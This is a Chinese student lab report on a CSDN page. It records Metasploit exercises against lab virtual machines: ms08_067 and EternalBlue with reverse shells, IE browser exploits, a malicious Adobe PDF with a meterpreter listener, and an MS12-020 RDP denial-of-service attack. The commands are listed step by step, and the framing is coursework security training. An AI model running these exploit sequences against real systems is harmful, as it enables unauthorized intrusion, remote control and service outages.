2018-2019 20165226 Exp5 MSF基础应用

最新推荐文章于 2024-08-08 19:34:38 发布
最新推荐文章于 2024-08-08 19:34:38 发布
阅读量111 收藏
点赞数
文章标签: 操作系统 网络 运维
原文链接:http://www.cnblogs.com/musea/p/10673280.html
版权

2018-2019 20165226 Exp5 MSF基础应用

目录

一、实验内容说明及基础问题回答

二、实验过程

三、问题与思考

四、实验总结

一、实验内容说明及基础问题回答

1、实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
(1) 一个主动攻击实践,如ms08_067; (1分)

(2)一个针对浏览器的攻击,如ms11_050;(1分)

(3) 一个针对客户端的攻击,如Adobe;(1分)

(4)成功应用任何一个辅助模块。(0.5分)

2、基础问题回答
(1)用自己的话解释什么是 exploit , payload , encode.

  • exploit
    渗透攻击模块,利用系统服务应用中的漏洞取得权限
  • payload
    一段代码,用于渗透之后在目标主机上执行
  • encode
    用来对payload进行编码,主要是为了避免“坏字符”和做到免杀

返回目录

二、实验过程

攻击机kali——172.30.2.47
靶机:①WinXP——172.30.6.172②win2000——172.30.5.55

Task1 主动攻击实践

ms08_067
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

msf exploit(ms08_067_netapi) > set LHOST 172.30.2.47 //攻击机ip

msf exploit(ms08_067_netapi) > set LPORT 5226//攻击端口

msf exploit(ms08_067_netapi) > set RHOST 172.30.6.172 //靶机ip,特定漏洞端口已经固定

msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

msf exploit(ms08_067_netapi) > exploit //攻击

1047870-20190409130830853-1961771941.png

  • 结果出现无法创建会话界面
    1047870-20190409130915688-257044040.png

  • 查看targets,与本机作对比
    1047870-20190409131249100-1364885440.png

  • 通过网上查找资料,发现xp中文版本打过补丁,于是换了一台win2000的,攻击成功
    1047870-20190409131648776-1434004229.png

  • 输入ipconfig/all,获取相关的MAC地址、IP地址、子网掩码、网关地址以及DNS
    1047870-20190409131948922-971312417.png

ms17_010

攻击:kali
靶机:①win2000②winxp③win2008

  • 进入msfconsole
  • 输入以下指令
search ms17-010 #搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue    #选择漏洞
show payloads   #查看可用攻击载荷
set payload windows/x64/meterpreter/reverse_tcp #选择攻击载荷
options

1047870-20190410083819733-1354410653.png

  • 再输入以下指令:
set RHOST 172.30.2.111 #设置攻击ip
set LHOST 172.30.2.47   #设置监听主机
set LPORT 5226  #设置监听端口

  • 失败
    1047870-20190410083943056-1324544571.png

  • 尝试更换虚拟机,终于,成功
    1047870-20190410084207433-530988460.png

Task2 针对浏览器的攻击

攻击机kali——172.30.2.47
靶机:①Win2000②win2007

ms11_050

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 172.30.2.47 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5226 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5226lxs //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit

1047870-20190409133735789-1862726978.png

  • 在浏览器输入http://172.30.2.47:8080/5226lxs,IE无法访问
    1047870-20190409133601932-1744077502.png

  • 设置浏览器的安全级别如下
    1047870-20190409133803414-649259516.png

  • 仍然不行,重新换一台虚拟机

  • 在设置Internet选项后仍是会出现IE浏览器的错误
    1047870-20190409134452247-1393896188.png

browser_autopwn

  • 换一个漏洞实施browser_autopwn模块
    • 攻击机里进入msfconsole,然后分别输入
use auxiliary/server/browser_autopwn2

set SRVHOST 172.30.2.47

set URIPATH auto

show options

  • 开始攻击,可以看到msf在不停的尝试不同的payload
    1047870-20190409140909222-433084081.png

  • 尝试成功,输出了可被访问的URLhttp://172.30.2.47:8080/auto并启动服务器
    1047870-20190409143009014-798414348.png

  • 失败again
    1047870-20190409143042776-351159830.png

Task3 对客户端的攻击,如Adobe

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回连

msf exploit(adobe_cooltype_sing) > set LHOST 172.30.2.47 //攻击机ip

msf exploit(adobe_cooltype_sing) > set LPORT 5226//攻击端口

msf exploit(adobe_cooltype_sing) > set FILENAME 20165226.pdf //设置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻击

  • 将生成的pdf文件拷贝到靶机上
    1047870-20190409202542571-659214307.png

  • 在kali上输入back退出当前模块,进入监听模块,输入以下命令:
msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

msf exploit(handler) > set LHOST 172.30.2.47 //攻击机ip

msf exploit(handler) > set LPORT 5226 //攻击端口固定

msf exploit(handler) > exploit

1047870-20190409202838281-1508794294.png

  • 在靶机上打开20165226.pdf文件
    1047870-20190409203040372-1384410551.png

  • 攻击机显示攻击成功
    1047870-20190409203102779-336271013.png

  • 靶机关闭PDF文件则失去权限
    1047870-20190409203814041-1272949205.png

Task4 成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块(唯一)

攻击:kali
靶机:win2008

  • 使用命令show auxiliary查看所有的辅助模块
  • 使用MS12-020(CVE-2012-0002)蓝屏攻击
  • 进入msfconsole
  • 输入以下指令
search ms12-020 #搜索漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids    #使用漏洞
options #查看配置信息
set RHOST 172.30.2.47 #设置攻击IP
exploit #开始攻击
  • 攻击成功
    1047870-20190410084900875-2072885089.png

返回目录

三、问题与思考

  • 问题1:在进行ms08_067_netapi攻击时出现以下情况
    1047870-20190409131036803-1949453955.png

  • 问题1解决方案:

    • 首先查看targets
      1047870-20190409131141798-245707037.png

    • 换另一台虚拟机,再次运行,攻击成功
      1047870-20190409131653823-233610122.png

返回目录

四、实验总结

本次实验学会了如何搜索漏洞,并在现有的漏洞环境下,尝试利用漏洞进行直接或间接主动攻击客户端。在整个过程中,其实找适合的虚拟机特别关键,整个过程耗费的时间大量集中在尝试不同虚拟机使其得以被攻击。不乏看出,打过补丁的虚拟机其抗攻击能力更强,这也提醒我们应时常更新配置。

返回目录

转载于:https://www.cnblogs.com/musea/p/10673280.html

weixin_33921089
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试笔记] 19.msf初步
H4ppyD0g的博客
05-05 543
msf利用浏览器漏洞渗透 这里利用IE6和漏洞ms10_018 原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。 msfconsole启动msf search ms10_018查看相关漏洞 use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块 set LHOST 192.168.2...
MSF漏洞利用完成但无法创建会话的几种原因
热门推荐
慢就是快
12-02 3万+
文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1 解决办法2.2 参数LHOST/SRVHOST 配置不当2.2.1 解决办法2.3 使用了NAT模式2.3.1 解决办法2.4存在杀软/EDR终端管理等2.4.1 解决办法2.5漏洞利用模块存在问题2.5.1 解决办法2.6目标已经修复漏洞打了补丁2.6.1 解决办法2.7 防火墙限制2.7.1 解决办法 1.引言 在实际攻防中经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块: exploit/windows/smb/p
MS17-010移植到MSF中进行入侵
自学编程_youkewang.top
05-17 1万+
勒索病毒爆发后,这个0day相继被各种利用,现在正在走向灭亡,趁现在大部分内网用户还没有重视该漏洞,于是我想在前人的教程基础上,发一篇自己总结出来的教程,让更多的人可以少走一点弯路。   图1-1. 教程分2个Part,第一个讲移植ms17-010扫描脚本到msf中进行漏扫;第二个讲移植ms17-010的exploit到msf中进行攻击。 漏洞的介绍和原理我就不废话了,请自行百度。
MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)
05-22 3739
【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
2018-2019 20165232 Exp5 MSF基础应用
weixin_33697898的博客
04-15 126
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践,如ms08-067; (1分) 一个针对浏览器的攻击,如ms11-050;(1分) 一个针对客户端的攻击,如Adobe;(1分) 成功应用任何一个辅助模块。(0.5分) 以上四个小实...
2018-2019-2 20165302 Exp5 MSF基础应用
weixin_34357962的博客
04-14 134
1.实验目的 掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路 2.实验内容 一个主动攻击实践; (1分) MS17-010 一个针对浏览器的攻击;(1分) ms14_064 一个针对客户端的攻击,如Adobe;(1分) exploit/windows/fileformat/adobe_utilprintf 成功应用任何一个辅助模块。(0.5分) auxiliary/scan...
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
CVE-2018-2883漏洞利用程序msf
03-27
针对CVE-2018-2883漏洞,Metasploit社区已经开发了一个专门的利用模块,即“msf”模块。通过这个模块,用户可以轻松地对目标系统进行漏洞扫描和利用。具体步骤如下: 1. **配置Metasploit**: 首先确保安装了最新...
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
5. 重启sshd服务以应用更改: - 对于Debian/Ubuntu系统: ``` sudo systemctl restart sshd ``` - 对于CentOS/RHEL系统: ``` sudo systemctl restart ssh ``` 6. 验证OpenSSH版本以确认升级成功: ``` ...
MSF本地漏洞复现
weixin_44508748的博客
04-24 1001
MS08-067复现 MS08-067攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。它影响的Windows系统包括:Windows 2000、Windows XP、Windows Server 2003 ...
linux:phpstudy安装及日常命令使用[表格]
h1008685的博客
08-06 370
linux——phpstudy安装及日常使用命令
打造智能障碍物检测系统:从零开始的深度学习项目
a871923942的博客
08-05 1086
随着自动驾驶技术的发展,障碍物检测成为保障行车安全的重要一环。通过深度学习模型,尤其是YOLO(You Only Look Once)模型,可以高效、准确地检测道路上的障碍物,从而提高自动驾驶系统的安全性和可靠性。
【Linux 从基础到进阶】进程管理与性能调优
weixin_39372311的博客
08-08 383
通过本文的介绍,您已经了解了 Linux 系统中进程管理和性能调优的基本概念和操作方法。本文提供了适用于 CentOS 和 Ubuntu 系统的具体命令和示例,涵盖了 CPU、内存、I/O 和网络的性能调优策略。合理的进程管理和性能调优可以显著提升系统的稳定性和运行效率。如有任何问题或需要进一步的帮助,请参考CentOS 官方文档和Ubuntu 官方文档或在 CSDN 博客中查阅相关内容。
鸿蒙Image组件设置长按手势回调事件
qq_36859035的博客
08-08 221
Image组件默认是可拖拽的,给Image组件设置draggable为false,即可成功触发长按事件:
48天笔试训练错题——day44
最新发布
ミカミミミ博客
08-08 754
48天笔试训练错题——day44.
MSF基础与团队模型详解:原则、应用与CMMI比较
MSF(Microsoft Solution Framework)是一种由微软提出的项目管理和软件开发框架,旨在提供一套结构化的方法来指导项目的成功实施。其基本原则与团队模型是MSF的核心组成部分,涵盖了项目管理的关键要素。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值